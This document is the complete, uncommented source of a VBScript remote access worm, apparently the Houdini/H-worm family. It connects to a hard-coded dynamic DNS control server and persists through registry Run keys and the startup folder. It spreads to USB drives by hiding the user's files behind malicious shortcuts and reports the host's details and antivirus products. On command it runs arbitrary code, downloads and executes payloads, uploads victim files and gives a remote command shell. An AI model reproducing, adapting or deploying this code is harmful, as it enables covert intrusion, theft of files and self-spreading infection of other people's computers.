'<[ recoder : houdini (c) skype : houdini-fx ]> '=-=-=-=-= config =-=-=-=-=-=-=-=-=-=-=-=-=-=-= host = "hostlan.ddns.net" port = 9999 installdir = "%temp%" lnkfile = true lnkfolder = true '=-=-=-=-= public var =-=-=-=-=-=-=-=-=-=-=-=-= dim shellobj set shellobj = wscript.createobject("wscript.shell") dim filesystemobj set filesystemobj = createobject("scripting.filesystemobject") dim httpobj set httpobj = createobject("msxml2.xmlhttp") '=-=-=-=-= privat var =-=-=-=-=-=-=-=-=-=-=-= installname = wscript.scriptname startup = shellobj.specialfolders ("startup") & "\" installdir = shellobj.expandenvironmentstrings(installdir) & "\" if not filesystemobj.folderexists(installdir) then installdir = shellobj.expandenvironmentstrings("%temp%") & "\" spliter = "<" & "|" & ">" sleep = 5000 dim response dim cmd dim param info = "" usbspreading = "" startdate = "" dim oneonce '=-=-=-=-= code start =-=-=-=-=-=-=-=-=-=-=-= on error resume next instance while true install response = "" response = post ("is-ready","") cmd = split (response,spliter) select case cmd (0) case "excecute" param = cmd (1) execute param case "update" param = cmd (1) oneonce.close set oneonce = filesystemobj.opentextfile (installdir & installname ,2, false) oneonce.write param oneonce.close shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & chr(34) wscript.quit case "uninstall" uninstall case "send" download cmd (1),cmd (2) case "site-send" sitedownloader cmd (1),cmd (2) case "recv" param = cmd (1) upload (param) case "enum-driver" post "is-enum-driver",enumdriver case "enum-faf" param = cmd (1) post "is-enum-faf",enumfaf (param) case "enum-process" post "is-enum-process",enumprocess case "cmd-shell" param = cmd (1) post "is-cmd-shell",cmdshell (param) case "delete" param = cmd (1) deletefaf (param) case "exit-process" param = cmd (1) exitprocess (param) case "sleep" param = cmd (1) sleep = eval (param) end select wscript.sleep sleep wend sub install on error resume next dim lnkobj dim filename dim foldername dim fileicon dim foldericon upstart for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then filesystemobj.copyfile wscript.scriptfullname , drive.path & "\" & installname,true if filesystemobj.fileexists (drive.path & "\" & installname) then filesystemobj.getfile(drive.path & "\" & installname).attributes = 2+4 end if for each file in filesystemobj.getfolder( drive.path & "\" ).Files if not lnkfile then exit for if instr (file.name,".") then if lcase (split(file.name, ".") (ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 2+4 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") set lnkobj = shellobj.createshortcut (drive.path & "\" & filename (0) & ".lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start " & replace(file.name," ", chrw(34) & " " & chrw(34)) &"&exit" fileicon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\" & shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\." & split(file.name, ".")(ubound(split(file.name, ".")))& "\") & "\defaulticon\") if instr (fileicon,",") = 0 then lnkobj.iconlocation = file.path else lnkobj.iconlocation = fileicon end if lnkobj.save() end if end if end if next for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders if not lnkfolder then exit for folder.attributes = 2+4 foldername = folder.name set lnkobj = shellobj.createshortcut (drive.path & "\" & foldername & ".lnk") lnkobj.windowstyle = 7 lnkobj.targetpath = "cmd.exe" lnkobj.workingdirectory = "" lnkobj.arguments = "/c start " & replace(installname," ", chrw(34) & " " & chrw(34)) & "&start explorer " & replace(folder.name," ", chrw(34) & " " & chrw(34)) &"&exit" foldericon = shellobj.regread ("HKEY_LOCAL_MACHINE\software\classes\folder\defaulticon\") if instr (foldericon,",") = 0 then lnkobj.iconlocation = folder.path else lnkobj.iconlocation = foldericon end if lnkobj.save() next end If end If end if next err.clear end sub sub uninstall on error resume next dim filename dim foldername shellobj.regdelete "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) shellobj.regdelete "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0) filesystemobj.deletefile startup & installname ,true filesystemobj.deletefile wscript.scriptfullname ,true for each drive in filesystemobj.drives if drive.isready = true then if drive.freespace > 0 then if drive.drivetype = 1 then for each file in filesystemobj.getfolder ( drive.path & "\").files on error resume next if instr (file.name,".") then if lcase (split(file.name, ".")(ubound(split(file.name, ".")))) <> "lnk" then file.attributes = 0 if ucase (file.name) <> ucase (installname) then filename = split(file.name,".") filesystemobj.deletefile (drive.path & "\" & filename(0) & ".lnk" ) else filesystemobj.deletefile (drive.path & "\" & file.name) end If else filesystemobj.deletefile (file.path) end if end if next for each folder in filesystemobj.getfolder( drive.path & "\" ).subfolders folder.attributes = 0 next end if end if end if next wscript.quit end sub function post (cmd ,param) post = param httpobj.open "post","http://" & host & ":" & port &"/" & cmd, false httpobj.setrequestheader "user-agent:",information httpobj.send param post = httpobj.responsetext end function function information on error resume next if inf = "" then inf = hwid & spliter inf = inf & shellobj.expandenvironmentstrings("%computername%") & spliter inf = inf & shellobj.expandenvironmentstrings("%username%") & spliter set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set os = root.execquery ("select * from win32_operatingsystem") for each osinfo in os inf = inf & osinfo.caption & spliter exit for next inf = inf & "plus" & spliter inf = inf & security & spliter inf = inf & usbspreading information = inf else information = inf end if end function sub upstart () on error resume Next shellobj.regwrite "HKEY_CURRENT_USER\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" shellobj.regwrite "HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\run\" & split (installname,".")(0), "wscript.exe //B " & chrw(34) & installdir & installname & chrw(34) , "REG_SZ" filesystemobj.copyfile wscript.scriptfullname,installdir & installname,true filesystemobj.copyfile wscript.scriptfullname,startup & installname ,true end sub function hwid on error resume next set root = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set disks = root.execquery ("select * from win32_logicaldisk") for each disk in disks if disk.volumeserialnumber <> "" then hwid = disk.volumeserialnumber exit for end if next end function function security on error resume next security = "" set objwmiservice = getobject("winmgmts:{impersonationlevel=impersonate}!\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_operatingsystem",,48) for each objitem in colitems versionstr = split (objitem.version,".") next versionstr = split (colitems.version,".") osversion = versionstr (0) & "." for x = 1 to ubound (versionstr) osversion = osversion & versionstr (i) next osversion = eval (osversion) if osversion > 6 then sc = "securitycenter2" else sc = "securitycenter" set objsecuritycenter = getobject("winmgmts:\\localhost\root\" & sc) Set colantivirus = objsecuritycenter.execquery("select * from antivirusproduct","wql",0) for each objantivirus in colantivirus security = security & objantivirus.displayname & " ." next if security = "" then security = "nan-av" end function function instance on error resume next usbspreading = shellobj.regread ("HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\") if usbspreading = "" then if lcase ( mid(wscript.scriptfullname,2)) = ":\" & lcase(installname) then usbspreading = "true - " & date shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" else usbspreading = "false - " & date shellobj.regwrite "HKEY_LOCAL_MACHINE\software\" & split (installname,".")(0) & "\", usbspreading, "REG_SZ" end if end If upstart set scriptfullnameshort = filesystemobj.getfile (wscript.scriptfullname) set installfullnameshort = filesystemobj.getfile (installdir & installname) if lcase (scriptfullnameshort.shortpath) <> lcase (installfullnameshort.shortpath) then shellobj.run "wscript.exe //B " & chr(34) & installdir & installname & Chr(34) wscript.quit end If err.clear set oneonce = filesystemobj.opentextfile (installdir & installname ,8, false) if err.number > 0 then wscript.quit end function sub sitedownloader (fileurl,filename) strlink = fileurl strsaveto = installdir & filename set objhttpdownload = createobject("msxml2.xmlhttp" ) objhttpdownload.open "get", strlink, false objhttpdownload.send set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) then shellobj.run objfsodownload.getfile (strsaveto).shortpath end if end sub sub download (fileurl,filedir) if filedir = "" then filedir = installdir end if strsaveto = filedir & mid (fileurl, instrrev (fileurl,"\") + 1) set objhttpdownload = createobject("msxml2.xmlhttp") objhttpdownload.open "post","http://" & host & ":" & port &"/" & "is-sending" & spliter & fileurl, false objhttpdownload.send "" set objfsodownload = createobject ("scripting.filesystemobject") if objfsodownload.fileexists (strsaveto) then objfsodownload.deletefile (strsaveto) end if if objhttpdownload.status = 200 then dim objstreamdownload set objstreamdownload = createobject("adodb.stream") with objstreamdownload .type = 1 .open .write objhttpdownload.responsebody .savetofile strsaveto .close end with set objstreamdownload = nothing end if if objfsodownload.fileexists(strsaveto) then shellobj.run objfsodownload.getfile (strsaveto).shortpath end if end sub function upload (fileurl) dim httpobj,objstreamuploade,buffer set objstreamuploade = createobject("adodb.stream") with objstreamuploade .type = 1 .open .loadfromfile fileurl buffer = .read .close end with set objstreamdownload = nothing set httpobj = createobject("msxml2.xmlhttp") httpobj.open "post","http://" & host & ":" & port &"/" & "is-recving" & spliter & fileurl, false httpobj.send buffer end function function enumdriver () for each drive in filesystemobj.drives if drive.isready = true then enumdriver = enumdriver & drive.path & "|" & drive.drivetype & spliter end if next end Function function enumfaf (enumdir) enumfaf = enumdir & spliter for each folder in filesystemobj.getfolder (enumdir).subfolders enumfaf = enumfaf & folder.name & "|" & "" & "|" & "d" & "|" & folder.attributes & spliter next for each file in filesystemobj.getfolder (enumdir).files enumfaf = enumfaf & file.name & "|" & file.size & "|" & "f" & "|" & file.attributes & spliter next end function function enumprocess () on error resume next set objwmiservice = getobject("winmgmts:\\.\root\cimv2") set colitems = objwmiservice.execquery("select * from win32_process",,48) dim objitem for each objitem in colitems enumprocess = enumprocess & objitem.name & "|" enumprocess = enumprocess & objitem.processid & "|" enumprocess = enumprocess & objitem.executablepath & spliter next end function sub exitprocess (pid) on error resume next shellobj.run "taskkill /F /T /PID " & pid,7,true end sub sub deletefaf (url) on error resume next filesystemobj.deletefile url filesystemobj.deletefolder url end sub function cmdshell (cmd) dim httpobj,oexec,readallfromany set oexec = shellobj.exec ("%comspec% /c " & cmd) if not oexec.stdout.atendofstream then readallfromany = oexec.stdout.readall elseif not oexec.stderr.atendofstream then readallfromany = oexec.stderr.readall else readallfromany = "" end if cmdshell = readallfromany end function